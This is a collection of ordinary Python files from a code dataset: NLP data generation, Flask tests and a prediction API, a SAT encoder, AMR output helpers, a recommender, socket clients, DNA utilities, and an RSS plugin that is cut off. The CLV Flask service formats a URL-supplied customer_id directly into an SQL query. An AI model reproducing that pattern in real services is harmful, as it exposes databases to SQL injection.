+{"seq_id":"439291497","text":"import random\n\nif __name__ == '__main__':\n\ttrain = []\n\tlabel = []\n\twith open('hw2.1_corpus.txt', 'r', encoding='utf-8') as f:\n\t\tlines = f.read().split('\\n')\n\t\tlines.remove('')\n\t\tfor l in range(len(lines[:-1])):\n\t\t\tif len(lines[l]) > 26 or len(lines[l+1]) > 26:\n\t\t\t\tcontinue\n\t\t\ttmpT = ''\n\t\t\tfor w in lines[l]:\n\t\t\t\ttmpT += ' ' + w\n\t\t\ttmpT += ' '\n\t\t\tidx = random.randint(1, len(lines[l+1]))\n\n\t\t\tif random.random()>0.2 and len(lines[l]) <= 24:\n\t\t\t\tidx2 = random.randint(1, len(lines[l+1]))\n\t\t\t\tif idx2\t!=\tidx:\n\t\t\t\t\tif idx2 > idx:\n\t\t\t\t\t\ttmpT += ' ' + str(idx)\n\t\t\t\t\t\ttmpT += ' ' + lines[l+1][idx-1]\n\t\t\t\t\t\ttmpT += ' ' + str(idx2)\n\t\t\t\t\t\ttmpT += ' ' + lines[l+1][idx2-1]\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmpT += ' ' + str(idx2)\n\t\t\t\t\t\ttmpT += ' ' + lines[l+1][idx2-1]\n\t\t\t\t\t\ttmpT += ' ' + str(idx)\n\t\t\t\t\t\ttmpT += ' ' + lines[l+1][idx-1]\n\t\t\t\telse:\n\t\t\t\t\ttmpT += ' ' + str(idx)\n\t\t\t\t\ttmpT += ' ' + lines[l+1][idx-1]\n\t\t\telse:\n\t\t\t\ttmpT += ' ' + str(idx)\n\t\t\t\ttmpT += ' ' + lines[l+1][idx-1]\n\n\t\t\ttmpL = ''\n\t\t\tfor w in lines[l+1]:\n\t\t\t\ttmpL += ' ' + w\n\t\t\ttmpL += ' '\n\t\t\ttrain.append(tmpT)\n\t\t\tlabel.append(tmpL)\n\n\twith open('train4.txt', 'w', encoding='utf-8') as f:\n\t\tfor l in train:\n\t\t\tf.write(l + '\\n')\n\n\twith open('label4.txt', 'w', encoding='utf-8') as f:\n\t\tfor l in label:\n\t\t\tf.write(l + '\\n')","sub_path":"task2/bo/generate_train.py","file_name":"generate_train.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"365626172","text":"from unittest.mock import patch\nfrom flask import url_for\nfrom flask_testing import TestCase\n\nfrom app import app\n\nclass TestBase(TestCase):\n def create_app(self):\n return app\n\nclass TestResponse(TestBase):\n def test_animal_on_page(self):\n with patch(\"requests.get\") as g:\n with patch(\"requests.post\") as p:\n g.return_value.text = \"Lion\"\n p.return_value.text = \"Roar\"\n\n response = self.client.get(url_for(\"index\"))\n self.assertIn(b\"Lion makes the noise Roar\", response.data)\n","sub_path":"service1/testing/test_mock.py","file_name":"test_mock.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"389916758","text":"import time\nfrom typing import List\n\nfrom my_solver.oliver.PuzzleInfo import PuzzleInfoInput, PuzzleInfoEncode\nfrom my_solver.oliver.encoder.EncoderList import EncoderList\nfrom my_solver.oliver.encoder.WriteCNFFile import write_cnf_file, one_template_function_delete, \\\n binary_template_function_delete, unit_template_function_delete\n\n\nclass Encoder(EncoderList):\n\n def calc_block_clauses(self) -> None:\n start = time.perf_counter()\n self.calc_block_clauses_list()\n self.clauses[\"block\"] = binary_template_function_delete(self.clauses[\"block\"])\n self.clauses[\"block_one\"] = one_template_function_delete(self.clauses[\"block_one\"])\n end = time.perf_counter()\n time_to_encode = end - start\n print(\"Finish block! Time: \" + str(time_to_encode))\n\n def calc_column_clauses(self) -> None:\n start = time.perf_counter()\n self.calc_column_clauses_list()\n self.clauses[\"column\"] = binary_template_function_delete(self.clauses[\"column\"])\n self.clauses[\"column_one\"] = one_template_function_delete(self.clauses[\"column_one\"])\n end = time.perf_counter()\n time_to_encode = end - start\n print(\"Finish column! Time: \" + str(time_to_encode))\n\n def calc_row_clauses(self) -> None:\n start = time.perf_counter()\n self.calc_row_clauses_list()\n self.clauses[\"row\"] = binary_template_function_delete(self.clauses[\"row\"])\n self.clauses[\"row_one\"] = one_template_function_delete(self.clauses[\"row_one\"])\n end = time.perf_counter()\n time_to_encode = end - start\n print(\"Finish row! Time: \" + str(time_to_encode))\n\n def calc_cell_clauses(self, field) -> None:\n start = time.perf_counter()\n self.calc_cell_clauses_list(field)\n self.clauses[\"unit\"] = unit_template_function_delete(self.clauses[\"unit\"])\n self.clauses[\"one\"] = one_template_function_delete(self.clauses[\"one\"])\n self.clauses[\"dist\"] = binary_template_function_delete(self.clauses[\"dist\"])\n\n end = time.perf_counter()\n time_to_encode = end - start\n print(\"Finish cell! Time: \" + str(time_to_encode))\n\n def encode(self, field: List[List[int]], info_input: PuzzleInfoInput) -> PuzzleInfoEncode:\n self.info = PuzzleInfoEncode(info_input.input_file_complete_absolute(), info_input.length, info_input.text)\n\n # add clauses for at least one possible value in each cell\n self.calc_cell_clauses(field)\n # add clauses for row distinction\n self.calc_row_clauses()\n # add clauses for column distinction\n self.calc_column_clauses()\n # add clauses for block distinction\n self.calc_block_clauses()\n\n num_clause = sum([len(sub_clause_list) for sub_clause_list in self.clauses.values()])\n num_var = self.info.length * self.info.square_of_length\n start_line = f\"p cnf {num_var} {num_clause}\\n\"\n output_file = self.info.output_file_name\n\n start = time.perf_counter()\n write_cnf_file(self.clauses, output_file, start_line)\n end = time.perf_counter()\n time_to_encode = end - start\n print(\"Time to write CNF-File: {time}s\".format(time=time_to_encode))\n return self.info\n","sub_path":"my_solver/oliver/encoder/Encoder.py","file_name":"Encoder.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"76023625","text":"'''\n AMR output functions\n'''\n\nimport os\n\n'''\n HTML\n'''\ndef get_ne(ne):\n name = '%s ---> %s' % (ne.entity_name_,\n ne.wiki_)\n coreference = ' Coref. name: ' \\\n '%s' % ne.coreference_\n neighbors = ' Neighbors:    '\n for i in ne.neighbors_:\n neighbors += '%s ' % str(i)\n neighbors += ''\n coherence = ' Coheret set:  '\n for i in ne.coherence_:\n coherence += '(%s, %s, %s) ' % (i[0], i[1], i[2].entity_name_)\n coherence += ''\n return '%s\\n%s\\n%s\\n%s\\n' % (name, coreference, neighbors, coherence)\n\ndef get_sentence(sen, out):\n graph = '' % sen.senid_\n senid = '%s' % sen.senid_\n sentence = '%s' % sen.sen_\n amr = '%s' % sen.amr_. \\\n replace('\\n', ''). \\\n replace(' ', ' ')\n nes = '\\n' % (sen.senid_, sen.senid_)\n for n in sen.named_entities_:\n nes += get_ne(sen.named_entities_[n])\n nes += ''\n out.write('\\n%s\\n%s\\n%s\\n%s\\n%s\\n\\n' % (senid, sentence,\n amr, nes, graph))\n\ndef html(amres, filename, outdir, curt=False):\n out = open('%s/%s.html' % (outdir, filename), 'w')\n import visualizer\n\n graphdir = '%s/%s' % (outdir, 'graphs')\n try:\n os.mkdir(graphdir)\n except OSError:\n pass\n\n # head = '\\n'\n head = os.path.dirname(os.path.abspath(__file__)) + '/../docs/html_head'\n out.write(open(head, 'r').read())\n\n for snt in amres:\n if curt:\n visualizer.visualizer_curt(snt, graphdir)\n else:\n visualizer.visualizer(snt, graphdir)\n get_sentence(snt, out)\n\n'''\n Visualized AMR graphs\n Input: 'Sentence' object\n'''\ndef graph(amres, outdir, curt=False):\n import visualizer\n\n graphdir = '%s/%s' % (outdir, 'graphs')\n try:\n os.mkdir(graphdir)\n except OSError:\n pass\n\n for snt in amres:\n if curt:\n visualizer.visualizer_curt(snt, graphdir)\n else:\n visualizer.visualizer(snt, graphdir)\n\n'''\n AMR nodes\n if you would like to modify the output format of AMR node, modify\n node.py: def __str__(self):\n'''\ndef node(amres, outdir):\n out = open('%s/amr_nodes' % outdir, 'w')\n for snt in amres:\n for acr in snt.amr_nodes_:\n node = snt.amr_nodes_[acr]\n if node.ful_name_ == 'name': # Ingore 'n / name' node\n pass\n else:\n out.write('%s\\n%s\\n' % (snt.senid_, node))\n\n'''\n Named entities\n'''\ndef namedentity(amres, outdir):\n out = open('%s/amr_nes' % outdir, 'w')\n for snt in amres:\n for acr in snt.amr_nodes_:\n node = snt.amr_nodes_[acr]\n if node.is_entity_:\n out.write('%s\\t%s / %s\\t%s\\t%s\\n' % (snt.senid_, node.name_,\n node.ful_name_,\n node.entity_name_,\n node.wiki_))\n\n'''\n AMR paths\n'''\ndef path(amres, outdir):\n out = open('%s/amr_paths' % outdir, 'w')\n for snt in amres:\n for path_type in snt.amr_paths_:\n paths = snt.amr_paths_[path_type]\n for p in paths:\n path = ''\n for i in p:\n path += '(\\'%s\\', \\'%s\\'), ' % (i[0], i[1])\n out.write('%s\\t%s\\t[%s]\\n' % (snt.senid_,\n path_type,\n path.strip(', ')))\n\n'''\n AMR named entity queries\n'''\ndef query(amres, outdir):\n out = open('%s/amr_queries' % outdir, 'w')\n for snt in amres:\n for i in snt.named_entities_:\n ne = snt.named_entities_[i]\n query = '%s(%s|%s)' % (ne.name(), ne.subtype_, ne.maintype_)\n for i in ne.neighbors_:\n query += '%s;' % i[1]\n query += '|'\n for i in ne.coherence_:\n query += '%s;' % i[2].name()\n\n out.write('%s\\t%s\\t%s\\n' % (snt.senid_,\n ne.entity_name_,\n query.strip(';')))\n\n'''\n Named entity wiki titile\n'''\ndef newiki(amr_table, outdir):\n wiki = set()\n output = open(outdir + 'amr_nes_wiki', 'w')\n for docid in sorted(amr_table):\n for senid in sorted(amr_table[docid]):\n sen = amr_table[docid][senid]\n assert sen.senid_ == senid\n amr_nodes = sen.amr_nodes_\n for n in amr_nodes:\n node = amr_nodes[n]\n if node.is_entity_:\n wiki.add(node.wiki_)\n for i in sorted(wiki):\n output.write('%s\\n' % i)\n","sub_path":"amr-reader/src/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"621334925","text":"from collections import OrderedDict\n\nfrom mapping import Mapping\nfrom recommenders.generic_recommender import GenericRecommender, Stats\n\n\nclass CooccurRank(GenericRecommender):\n def __init__(self, BASEDIR, session_only = False, cycle_time=1):\n super().__init__(BASEDIR, session_only, cycle_time)\n self.name = 'coocrank'\n\n mapper = Mapping()\n self.rec_mapping = mapper.get_header_rec()\n self.event_mapping = mapper.get_header_event()\n self.item_id_idx = self.rec_mapping.index('ITEM_SOURCE')\n self.publisher_id_idx = self.rec_mapping.index('PUBLISHER')\n self.recs_idx = self.event_mapping.index('recs')\n self.user_id_idx = self.event_mapping.index('USER_COOKIE')\n\n self.user_item_dict = {}\n self.cooccur_dict = {}\n\n self.correct = 0\n self.total_events = 0\n self.nrrows =0\n self.i = 0\n\n def init_new_day(self):\n self.evaluation = Stats()\n self.user_item_dict = {}\n self.cooccur_dict = {}\n self.session_length = {}\n\n def store(self, item_id, user_id ):\n if not user_id in self.user_item_dict.keys():\n self.user_item_dict[user_id] = []\n if item_id == 0 or item_id =='0' or user_id == '0' or user_id == 0:\n return\n if item_id in self.user_item_dict[user_id]:\n self.i += 1\n return\n\n if item_id not in self.cooccur_dict.keys():\n self.cooccur_dict[item_id] = {}\n for coitem in self.user_item_dict[user_id]:\n if coitem not in self.cooccur_dict.keys():\n self.cooccur_dict[coitem] = {}\n if coitem in self.cooccur_dict[item_id].keys():\n self.cooccur_dict[item_id][coitem] += 1\n else:\n self.cooccur_dict[item_id][coitem] = 1\n if item_id in self.cooccur_dict[coitem].keys():\n self.cooccur_dict[coitem][item_id] += 1\n else:\n self.cooccur_dict[coitem][item_id] = 1\n if not item_id in self.user_item_dict[user_id]:\n self.user_item_dict[user_id].append(item_id)\n\n def store_view(self, nextrec):\n try:\n item_id = nextrec[self.item_id_idx]\n user_id = nextrec[self.user_id_idx]\n\n self.store(item_id, user_id)\n except:\n print(\"exception\")\n print(nextrec)\n print(self.nrrows)\n\n\n def store_event(self, nextevent):\n user_id = nextevent[self.user_id_idx]\n rec_clicked = self.true_rec(nextevent)\n # self.store_view(nextevent)\n\n if user_id != '0':\n self.store(item_id=rec_clicked, user_id=user_id)\n else:\n item_id = nextevent[self.item_id_idx]\n if item_id not in self.cooccur_dict.keys():\n self.cooccur_dict[item_id] = {}\n if rec_clicked not in self.cooccur_dict.keys():\n self.cooccur_dict[rec_clicked] = {}\n if rec_clicked in self.cooccur_dict[item_id].keys():\n self.cooccur_dict[item_id][rec_clicked] += 1\n else:\n self.cooccur_dict[item_id][rec_clicked] = 1\n if item_id in self.cooccur_dict[rec_clicked].keys():\n self.cooccur_dict[rec_clicked][item_id] += 1\n else:\n self.cooccur_dict[rec_clicked][item_id] = 1\n\n def get_recommendation(self, nextevent):\n item_id = nextevent[self.item_id_idx]\n user_id = nextevent[self.user_id_idx]\n sorted_item_list = []\n try:\n item_dict = self.cooccur_dict[item_id]\n ordered = OrderedDict(sorted(item_dict.items(),key=lambda t: t[1], reverse=True))\n sorted_item_list = list(ordered.keys())\n except:\n pass\n if 0 in sorted_item_list:\n sorted_item_list.remove(0)\n if item_id in sorted_item_list:\n sorted_item_list.remove(item_id)\n try:\n user_items = self.user_item_dict[user_id]\n result = [x for x in sorted_item_list if x not in user_items]\n return result[0:6]\n except:\n return sorted_item_list[0:6]\n\n\n\n def run_ranker(self):\n for line in self.bridge_table:\n command = line.split('\\t')[0]\n if(command == 'rec'):\n nextrec = self.rec_csv.readline().split('\\t')\n self.store_view(nextrec)\n self.add_session(nextrec)\n if(command == 'event'):\n self.total_events += 1\n nextevent = self.event_csv.readline().split('\\t')\n self.add_score(nextevent)\n self.store_event(nextevent)\n\n self.nrrows += 1\n if (self.nrrows % 100000 == 0):\n print(self.i)\n self.logging()","sub_path":"recommenders/cooccur_based_ranker.py","file_name":"cooccur_based_ranker.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"306730856","text":"import struct\n\na = \"hello this is my [redacted]\"\nb = bytearray()\n\nb.extend(map(ord,a))\n\nl = len(a)\n\np = struct.pack('>I',l) + b\n\nprint(l)\nprint(p)\n\nsiz = struct.calcsize('>I')\nprint(siz)\n\nv = struct.unpack('>I',p[:siz])\nprint(v)\nprint(p[siz:])\n\n\nu = \"\\x00\\x00\\x00\\x2C{\\\"Type\\\":6,\\\"Info\\\":\\\"info\\\",\\\"PayLoad\\\":\\\"payload\\\"}\"\n\nub = bytearray()\nub.extend(map(ord,u))\n\ng = struct.unpack('>I',ub[:siz])\n\nprint(g)\n","sub_path":"PythonTests/BInaryTest.py","file_name":"BInaryTest.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"273821540","text":"import flask\nimport random\nimport pandas as pd\nimport logging\nimport os\nimport sqlite3\nfrom flask_json import FlaskJSON, JsonError, as_json\n# logging\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level='DEBUG')\n\n\n# ----| IO functions\n\ndef get_customer_prediction(customer_id=None):\n \"\"\"Get predictions for a customer\n\n customer_id: returns random customer if None\n \"\"\"\n logger.info('reading predictions from db')\n file=flask.current_app.config.predictions_file\n conn=sqlite3.connect(file)\n if customer_id:\n query='select CLV from predictions where customer_id = \"{}\"'\n results=conn.execute(query.format(customer_id)).fetchall()\n if results:\n prediction=results[0][0]\n else:\n raise JsonError(description='no data for this customer_id',\n status_=404)\n else:\n query='select * from predictions order by random() limit 1'\n customer_id, prediction=conn.execute(query).fetchall()[0]\n return customer_id, prediction\n\n\n# CLV service\nCLV_server = flask.Blueprint('CLV_server', 'CLV_server')\n\n\n@CLV_server.route('/customers/<customer_id>/predicted_CLV')\n@as_json\ndef CLV_prediction(customer_id):\n \"\"\"Return CLV prediction for the given customer_id\n\n if customer_id is 'random', the customer id is chosen at random from the available data.\n\n ex:\n >>GET /customers/2504175708a53b19fe067b06472e4cec/predicted_CLV\n {\n \"customer_id\": \"2504175708a53b19fe067b06472e4cec\", \n \"predicted_CLV\": 116.92\n }\n \"\"\"\n if customer_id == 'random':\n customer_id = None\n customer_id, predicted_CLV = get_customer_prediction(customer_id)\n payload = {\n 'customer_id': customer_id,\n 'predicted_CLV': predicted_CLV\n }\n return payload\n\n@CLV_server.route('/test')\ndef test():\n return 'OK'\n\n# ----| app startup\n\n\ndef create_app(config='prod'):\n app = flask.Flask('CLV_predict')\n app.register_blueprint(CLV_server)\n FlaskJSON(app)\n\n if config == 'debug':\n app.config.predictions_file = 'data/predictions_test.db'\n app.debug = True\n os.environ['WERKZEUG_DEBUG_PIN'] = 'off'\n elif config == 'test':\n app.config.predictions_file = 'data/predictions_test.db'\n elif config == 'prod':\n app.config.predictions_file = 'data/predictions.db'\n return app\n\n\nif __name__ == '__main__':\n app = create_app()\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"292921971","text":"# -*- coding: utf-8 -*-\n# __author__ = 'qinjincheng'\n\nimport socket\nimport random\nimport time\n\ndef main():\n host = '127.0.0.1'\n port = 8080\n for i in range(random.randrange(10, 20)):\n time.sleep(1)\n s = socket.socket()\n s.connect((host, port))\n print('client send ({}) to server'.format(i))\n s.send(str(i).encode())\n data = s.recv(1024)\n print('client recv raw data ({}) from server'.format(data))\n print('client recv dec data ({}) from server'.format(data.decode()))\n s.close()\n\ndef main(sk):\n {'tcp': tcp_client, 'udp': udp_client}[sk]()\n\ndef tcp_client():\n host = socket.gethostname()\n port = 12345\n print('Connect -> {}:{}'.format(host, port))\n s = socket.socket()\n s.connect((host, port))\n print('Connection already established')\n info = str()\n while info != 'byebye':\n data = input('Content send: ')\n s.send(data.encode())\n if data == 'byebye':\n break\n info = s.recv(1024).decode()\n print('Content received:\\n{}'.format(info))\n s.close()\n\ndef udp_client():\n host = socket.gethostname()\n port = 54321\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n data = input('Please input a Centigrade degree: ')\n s.sendto(data.encode(), (host, port))\n print(s.recv(1024).decode())\n s.close()\n\nif __name__ == '__main__':\n main(sk='udp')\n","sub_path":"sckt/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"561456820","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport urllib\nimport mechanize\n\nurl = \"http://127.0.0.1:8000/cgi-bin/index.py\"\n\nbr = mechanize.Browser()\npage = br.open(url)\n\nbr.select_form(nr=0)\nbr[\"name\"]=\"MOTOUCHI\"\nbr[\"comments\"]=\"hello world\"\nbr.submit()\n","sub_path":"network/seccamp/client3.py","file_name":"client3.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"501064558","text":"\"\"\"BioDNA : a module of DNA processing functions \"\"\"\nimport re\n# ----------------------------------------\n\ndef complementDNA_to_DNA( DNA ):\n \"\"\"Returns the complement strand of DNA\"\"\"\n\n # you need to do the work here\n changeOriginal = \"ACTG\"\n toComplement = \"TGAC\"\n transTable = str.maketrans(changeOriginal, toComplement)\n complementaryStrand = DNA.translate(transTable)\n \n return complementaryStrand\n# ----------------------------------------\n\n# ----------------------------------------\ndef complementDNA_to_RNA( DNA ):\n \"\"\"Returns the complement strand of RNA\"\"\"\n\n # you need to do the work here\n changeOriginal = \"T\"\n toComplement = \"U\"\n transTable = str.maketrans(changeOriginal, toComplement)\n complementaryStrand = DNA.translate(transTable) \n\n return complementaryStrand\n# ----------------------------------------\n\n# ---------------------------------------- \ndef transcribe( DNA ):\n \"\"\"Simulates transcription by building template strand and then complementing that to RNA\"\"\"\n \n # gene is on the DNA strand\n # but RNA copy is built off the template (or anti-sense) strand\n\n mRNA = \"\" \n\n # (a) get complement of the DNA strand (that is, make the template strand)\n compDNA = complementDNA_to_DNA(DNA)\n \n # (b) get mRNA complement of the template strand\n # (c) return the mRNA\n \n # you need to do the work here \n \n complementDNA = complementDNA_to_DNA(DNA)\n \n print (\" DNA: 5'\", DNA, \"3'\")\n print (\" DNA: 3'\", complementDNA, \"5'\")\n \n Bars = \"\"\n DNALen = len(DNA)\n while (DNALen > 0):\n Bars = Bars + \"|\"\n DNALen = DNALen - 1\n \n print (\" \", Bars) \n \n mRNA = complementDNA_to_RNA(DNA)\n \n\n \n \n return mRNA\n# ----------------------------------------\ndef getDNA(filename):\n \"\"\" Takes a .fna file of a DNA sequence and reads in the lines\"\"\"\n \n INFILE = open(filename, 'r')\n \n for filelines in INFILE:\n sequence = filelines\n \n return sequence\n\n\n#-----------------------------------------\ndef findDirectRepeats(upstream):\n \"\"\"Uses regex to search through the file and find direct repeats\"\"\"\n DRregex = re.compile(r\"(.)(.)(.?)\\1\\2\\3\")\n \n DRiterator = DRregex.finditer(upstream)\n DRtotal = 0\n for nextDR in DRiterator: \n DR = nextDR.group() \n DRstart = nextDR.start() \n DRend = nextDR.end() \n DRtotal = DRtotal + len(DR)\n \n print (\"Found DR:\", DR, \"[\", DRstart+1, \"to\", DRend, \"bp]\") \n return DRtotal\n \ndef findMirrorRepeats(upstream):\n \"\"\"Uses regex to search through the file and find mirror repeats\"\"\"\n \n MRregex = re.compile( r\"(.)(.)(.)\\3\\2\\1\" ) # build regex for MR of len=4bp\n \n MRiterator = MRregex.finditer(upstream) # find all matches\n MRtotal = 0 #going to be used to find percentile\n for nextMR in MRiterator: # loop thru list of matches\n MR = nextMR.group() # get the actual regex match \n MRstart = nextMR.start() # where did it begin\n MRend = nextMR.end() # location just after the end\n MRtotal = MRtotal + len(MR)\n \n print (\"Found MR:\", MR, \"[\", MRstart+1, \"to\", MRend, \"bp]\") \n return MRtotal\n#-----------------------------------------\ndef findATRepeats(upstream):\n \"\"\"Uses regex to search through the file and find ATAT repeats\"\"\"\n \n ATregex = re.compile(r\"(A)(T)(A)(T)\\1\\2\\3\\4\")\n \n ATiterator = ATregex.finditer(upstream)\n ATtotal = 0\n for nextAT in ATiterator: \n AT = nextAT.group() \n ATstart = nextAT.start() \n ATend = nextAT.end() \n ATtotal = ATtotal + len(AT)\n \n print (\"Found AT:\", AT, \"[\", ATstart+1, \"to\", ATend, \"bp]\") \n return ATtotal\n#-----------------------------------------\ndef makeAminoAcidTable( ):\n \"\"\"Returns a Python Dictionary (hash table) that maps RNA nucleotides to Amino Acid symbols;\n both one letter and three letter symbols are returned; the user will need to parse which of\n these symbols they want to use\"\"\"\n \n AAtable = { \"UUU\":\"F|Phe\",\"UUC\":\"F|Phe\",\"UUA\":\"L|Leu\",\"UUG\":\"L|Leu\",\"UCU\":\"S|Ser\",\"UCC\":\"S|Ser\",\n \"UCA\":\"S|Ser\",\"UCG\":\"S|Ser\",\"UAU\":\"Y|Tyr\",\"UAC\":\"Y|Tyr\",\"UAA\":\"*|***\",\"UAG\":\"*|***\",\n \"UGU\":\"C|Cys\",\"UGC\":\"C|Cys\",\"UGA\":\"*|***\",\"UGG\":\"W|Trp\",\"CUU\":\"L|Leu\",\"CUC\":\"L|Leu\",\n \"CUA\":\"L|Leu\",\"CUG\":\"L|Leu\",\"CCU\":\"P|Pro\",\"CCC\":\"P|Pro\",\"CCA\":\"P|Pro\",\"CCG\":\"P|Pro\",\n \"CAU\":\"H|His\",\"CAC\":\"H|His\",\"CAA\":\"Q|Gln\",\"CAG\":\"Q|Gln\",\"CGU\":\"R|Arg\",\"CGC\":\"R|Arg\",\n \"CGA\":\"R|Arg\",\"CGG\":\"R|Arg\",\"AUU\":\"I|Ile\",\"AUC\":\"I|Ile\",\"AUA\":\"I|Ile\",\"AUG\":\"M|Met\",\n \"ACU\":\"T|Thr\",\"ACC\":\"T|Thr\",\"ACA\":\"T|Thr\",\"ACG\":\"T|Thr\",\"AAU\":\"N|Asn\",\"AAC\":\"N|Asn\",\n \"AAA\":\"K|Lys\",\"AAG\":\"K|Lys\",\"AGU\":\"S|Ser\",\"AGC\":\"S|Ser\",\"AGA\":\"R|Arg\",\"AGG\":\"R|Arg\",\n \"GUU\":\"V|Val\",\"GUC\":\"V|Val\",\"GUA\":\"V|Val\",\"GUG\":\"V|Val\",\"GCU\":\"A|Ala\",\"GCC\":\"A|Ala\",\n \"GCA\":\"A|Ala\",\"GCG\":\"A|Ala\",\"GAU\":\"D|Asp\",\"GAC\":\"D|Asp\",\"GAA\":\"E|Glu\",\n \"GAG\":\"E|Glu\",\"GGU\":\"G|Gly\",\"GGC\":\"G|Gly\",\"GGA\":\"G|Gly\",\"GGG\":\"G|Gly\"}\n \n return AAtable\n# ------------------------\n \n\ndef translate( mRNA, AAtable ): \n \"\"\"Returns the 3-letter amino acid string of symbols for the corresponding mRNA\"\"\"\n \n protein = \"\"\n \n startBP = 0\n endBP = len(mRNA)\n \n nextCodonStart = startBP\n # while we don't run off the end of the sequence of mRNA, snag nucleotide codons\n # and build a sequence of amino acid symbols (uses the 3-letter symbols)\n while ( nextCodonStart+3 <= endBP):\n \n # slice out the new RNA nucleotide triple\n nextCodon = mRNA[nextCodonStart:nextCodonStart+3]\n \n # play RIBOSOME: convert an RNA nucleotide-triple to an amino acid symbol\n nextAA = AAtable[ nextCodon ]\n \n # amino acid symbols come as two types of symbols (3 letter and 1 letter);\n # in general: triple:|\n # e.g., \"GAG\":\"E|Glu\" ... thus we need to parse out which type of symbol we want\n \n # we want the 3-letter 'Glu' version here, so slice out from location 2 to the end\n AAsymbol = nextAA[2:]\n \n # add this AA onto the end of the growing amino-acid (protein) chain\n protein = protein + AAsymbol\n \n # move down to next triple\n nextCodonStart = nextCodonStart + 3\n \n # end while more triples to check\n \n return protein\n\n# ---- end translate() ----------------------------------------","sub_path":"Upstream_Sequences/BioDNA.py","file_name":"BioDNA.py","file_ext":"py","file_size_in_byte":6651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"33586782","text":"import feedparser\nimport sys\n\nfrom twisted.python import log\n\nimport plugin\nfrom utils import str_utils, command_saver\n\nSAVE_FILE = \"feedretriver_settings.save\"\nFAIL_MESSAGE = (\"Unable to download or parse feed. Remove unused feeds using \"\n \"the !listfeed and !removefeed commands.\")\n\nHELP_MESSAGE = (\"!addfeed url [fetch time [custom title]] where:\\n\"\n \"url - is the url of the atom or rss feed\\n\"\n \"fetch time - is the number of minutes between each request\\n\"\n \"custom title - is the title used for this feed.\\n\"\n \"If no title is given, the default title parsed from the \"\n \"feed will be used instead.\")\n\nREMOVING_FEED_MESSAGE = u\"Removing: #{} - {}\"\nLIST_FEED_ITEM_MESSAGE = u\"#{}: {}\"\nNO_FEED_MESSAGE = u\"No feeds\"\n\nDEFAULT_FETCH_TIME = 10*60\n\ndef FeedItemToString(title, link, feed_title = \"\"):\n return str_utils.sanitize_string(u\"{}: {} <{}>\".format(feed_title, title, link))\n\n# The Feed class handles printing out new entries\nclass Feed():\n # Note that data could both be a url, or an already parsed feed\n def __init__(self, data, title):\n if isinstance(data, basestring):\n data = feedparser.parse(data)\n self.last_entry = 0\n self._set_last(data.entries)\n self.title = title\n self._update_title(data)\n\n def update(self, data, say):\n if isinstance(data, basestring):\n data = feedparser.parse(data)\n if data.bozo != 0:\n log.msg(\"Error updating feed \" + self.title)\n return\n self._update_title(data)\n log.msg(\"Updating feed: \" + self.title)\n for entry in data.entries:\n # TODO: Check id, title and link, etc\n # Maybe save the entire data.entries and remove all duplicate when\n # a new update happens?\n if entry.published_parsed <= self.last_entry:\n break\n say(FeedItemToString(entry.title, entry.link, self.title))\n self._set_last(data.entries)\n\n def _update_title(self, parsed):\n if parsed.bozo == 0 and self.title == \"\":\n self.title = parsed.feed.title\n self.title = str_utils.sanitize_string(self.title)\n\n def _set_last(self, entries):\n if len(entries) > 0:\n self.last_entry = entries[0].published_parsed\n\n\n# Simple polling class, fetches the feed in a regular intervall and passes\n# the information on to the Feed object\nclass Feedpoller():\n def __init__(self, say, url, update_freq=DEFAULT_FETCH_TIME, title=\"\"):\n parsed = feedparser.parse(url)\n self.feed = Feed(parsed, title)\n if parsed.bozo == 0:\n self.modified = parsed.get(\"modified\", None)\n self.etag = parsed.get(\"etag\", None)\n say(\"Added feed: \" + self.feed.title)\n else:\n self.modified = \"\"\n say(FAIL_MESSAGE)\n self.say = say\n self.url = url\n self.consecutive_fails = 0\n self.update_freq = update_freq\n self.update_count = 0\n\n def update(self):\n self.update_count += 1\n if self.update_count >= self.update_freq:\n self.update_count = 0\n parsed = feedparser.parse(self.url, modified=self.modified, etag=self.etag)\n if parsed.bozo == 1:\n self.consecutive_fails += 1\n if self.consecutive_fails % 10 == 0:\n self.say(FAIL_MESSAGE)\n else:\n self.modified = parsed.get(\"modified\", None)\n self.etag = parsed.get(\"etag\", None)\n self.feed.update(parsed, self.say)\n self.consecutive_fails = 0\n\n# Aggregator class for adding and handling feeds\nclass Feedretriever(plugin.Plugin):\n def __init__(self):\n plugin.Plugin.__init__(self, \"Feedretriever\")\n self.feeds = []\n self.saver = command_saver.CommandSaver(SAVE_FILE)\n\n def started(self, settings):\n log.msg(\"Feedretriever.started\", settings)\n self.saver.read(lambda server, channel, message: self.privmsg(str(server), None, str(channel), message))\n\n def privmsg(self, server, user, channel, message):\n say = lambda msg: self.say(server, channel, msg)\n if message.startswith(\"!feed\") or message.startswith(\"!addfeed\"):\n _, url, time, title = str_utils.split(message, \" \", 4)\n try:\n time = int(time) * 60\n except:\n time = DEFAULT_FETCH_TIME\n if url == 